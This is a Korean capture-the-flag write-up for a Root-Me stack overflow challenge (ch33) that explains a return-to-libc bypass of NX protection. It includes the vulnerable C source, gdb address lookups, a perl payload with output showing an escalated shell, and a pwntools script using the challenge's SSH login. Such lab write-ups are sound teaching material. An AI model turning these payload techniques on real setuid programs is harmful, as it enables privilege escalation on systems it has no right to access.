1. intro
2. code 및 분석
2.1. code
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
int main (int argc, char ** argv){
char message[20];
if (argc != 2){
printf ("Usage: %s <message>\n", argv[0]);
return -1;
}
setreuid(geteuid(), geteuid());
strcpy (message, argv[1]);
printf ("Your message: %s\n", message);
return 0;
}
2.2. 분석
argv[1]을 message 변수에 복사하고 이를 출력한다.
3. 취약점 확인 및 공격 준비
3.1. 취약점
argv[1]의 크기를 체크하지 않아 overflow가 발생한다.
3.2. 공격 준비
NX 보호기법이 걸려있는 bof 문제이다.
이 경우 heap buffer나 stack buffer에 shellcode 삽입 시 실행되지 않는다.
이에 RTL 즉 return to library 기법으로 우회할 수 있다.
즉, return 시 library의 system, execve 등의 함수 주소로 jmp하고 해당 함수에 맞는 인자를 적절히 넣어주면 된다.
우선 system 함수를 사용해보자.
system 함수의 원형은
int system(const char *string);
이며, 모든 함수는 해당 함수 실행 후 다시 돌아갈 위치를 저장해야하기에 실질적으로 stack에는
함수 주소 + 함수 종료 후 돌아갈 주소 + 인자1 + 인자2 + 인자3 + ...
와 같이 데이터가 쌓이게 된다.
그러므로 본 문제에서는
system 함수 주소 + dummy + /bin/sh 문자열 주소
의 구조가 되어야 한다.
그리고 /bin/sh의 경우 직접적으로 문자열을 찾아 해당 주소를 넣어줘도 되지만,
스택 내에 많은 값 중 적절한 임의의 문자열 (A 라던지, B 라던지...) 로된 shell을 실행시켜주는 프로그램을 작성해두고, path 또한 추가하여 해당 프로그램을 실행하는 방법이 있다.
우선 임의의 문자열을 실행하는 방법으로 시도해보자.
간단히 shell을 실행해주는 프로그램을 코딩하면 아래와 같다.
#include <stdio.h>
int main() {
system("/bin/sh");
}
컴파일해서 실행해보면 shell이 잘 뜬다.
app-systeme-ch33@challenge02:/tmp/wv$ vi a.c
app-systeme-ch33@challenge02:/tmp/wv$ gcc -o a a.c
a.c: In function ‘main’:
a.c:4:2: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
system("/bin/sh");
^~~~~~
app-systeme-ch33@challenge02:/tmp/wv$ ./a
$ id
uid=1133(app-systeme-ch33) gid=1133(app-systeme-ch33) groups=1133(app-systeme-ch33),100(users)
이제 어디서든 a를 입력하면 해당 프로그램이 실행될 수 있도록 PATH를 등록하고 다시 실행해보면
app-systeme-ch33@challenge02:/tmp/wv$ export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/opt/tools/checksec/:/tmp/wv"
app-systeme-ch33@challenge02:/tmp/wv$ a
$ id
uid=1133(app-systeme-ch33) gid=1133(app-systeme-ch33) groups=1133(app-systeme-ch33),100(users)
잘 실행 된다.
이제 system 함수의 주소를 확인해보면 간단히 gdb로 확인할 수 있다.
gef➤ p system
$1 = {<text variable, no debug info>} 0xb7e68310 <system>
단, 프로그램 실행 후 해당 주소 확인이 가능하다.
(그냥 main에 브레이크를 걸고 실행 후 위와 같이 확인 가능하다.)
이제 argv[1]이 어디로 얼마나 복사되는지 확인해보면
0x08048531 <+75>: mov 0xc(%ebp),%eax
0x08048534 <+78>: add $0x4,%eax
0x08048537 <+81>: mov (%eax),%eax
0x08048539 <+83>: push %eax
0x0804853a <+84>: lea -0x1c(%ebp),%eax
0x0804853d <+87>: push %eax
0x0804853e <+88>: call 0x8048390 <strcpy@plt>
ebp-0x1c 즉 -28 byte 위치에 복사된다.
그러므로 ret 위치는 입력받는 값 32 byte 이후 4 byte가 된다.
마지막으로 shell을 실행시켜주는 프로그램의 파일 명인 a 즉 0x61을 메모리에서 찾아야하는데,
가능하면 변조되지 않는 code 영역에서 찾는 것이 좋고,
가장 유의해야하는 부분은 문자 이후에 null 값이 있어야 끝으로 인지하기에 실질적으로 찾아야하는 값은 0x0061이다.
만, 잘 찾아지지 않아 반대로 아무 값이나 가져오고 해당 값으로 파일명을 변경해주었다.
gef➤ x/x 0x8048034
0x8048034: 0x00000006
app-systeme-ch33@challenge02:/tmp/wv$ cp a `perl -e 'print "\x06"'`
app-systeme-ch33@challenge02:/tmp/wv$ ls
''$'\006' a a.c
4. exploit
app-systeme-ch33@challenge02:~$ ./ch33 `perl -e 'print "A"x32,"\x10\x83\xe6\xb7","AAAA","\x34\x80\x04\x08"'`
Your message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒AAAA4▒
$ id
uid=1233(app-systeme-ch33-cracked) gid=1133(app-systeme-ch33) groups=1133(app-systeme-ch33),100(users)
$ cat .passwd
----------#플래그는 삭제
2022.07.14 update
이번에는 /bin/sh 문자열을 찾아 인자로 넘기기.
gef➤ p system
$2 = {<text variable, no debug info>} 0xb7e68310 <system>
gef➤ find &system,+999999999,"/bin/sh"
0xb7f8ad4c
warning: Unable to access 16000 bytes of target memory at 0xb7fd8f54, halting search.
1 pattern found.
gef➤ x/s 0xb7f8ad4c
0xb7f8ad4c: "/bin/sh"
from pwn import *
system_add=0xb7e68310
binsh_add=0xb7f8ad4c
pay=['','']
pay[0] = b'./ch33'
pay[1] = b''
pay[1] += b'A'*32
pay[1] += p32(system_add)
pay[1] += b'DUMY'
pay[1] += p32(binsh_add)
s = ssh(user='app-systeme-ch33',host='challenge02.root-me.org',port=2222,password='app-systeme-ch33')
p = s.process(pay)
p.interactive()
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